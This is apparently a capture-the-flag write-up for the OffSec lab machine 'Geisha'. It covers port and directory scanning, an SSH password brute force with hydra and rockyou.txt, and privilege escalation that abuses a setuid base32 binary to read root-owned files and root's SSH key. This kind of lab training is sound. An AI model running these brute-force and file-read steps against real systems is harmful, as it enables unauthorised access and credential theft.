OffSec PG - Geisha


Machine IP →

Network Scan

Nmap scan → nmap -sC -A -Pn -p- -o nmap.txt

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))
7080HTTPSssl/empowerid LiteSpeed
7125HTTPnginx 1.17.10
8088HTTPLiteSpeed httpd
9198HTTPSimpleHTTPServer 0.6 (Python 2.7.16)

Web Scan

GoBuster scan → gobuster dir -u<ports> -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php

Directories/files listed →

Port 8088 →

  • cgi-bin/ (404)
  • docs/
  • blocked/ (403)

Port 7125 →

  • shadow (403)
  • passwd

The passwd file lists user geisha.


With the username as geisha, a brute force was launched on the ssh server using hydra as follows → hydra -l geisha -P /home/tanq/installations/SecLists/rockyou.txt ssh://

This gives the password as letmein. After a successful login, the user flag can be obtained.

Privilege Escalation

Using the user shell, enumerated for setuid binaries as follows → find / -perm -u=s 2>/dev/null.

This resulted in an interesting find for the binary /usr/bin/base32. This could be used to read files with a privileged access, thereby allowing reads of files owned by root. Therefore, it was used to read the root flag as follows →

/usr/bin/base32 "$file" | /usr/bin/base32 --decode

This can also be used to obtain root shell by using it to leak the ssh key of root and then using it to log in to the machine via ssh.

This gave the root flag.

This post is licensed under CC BY 4.0 by the author.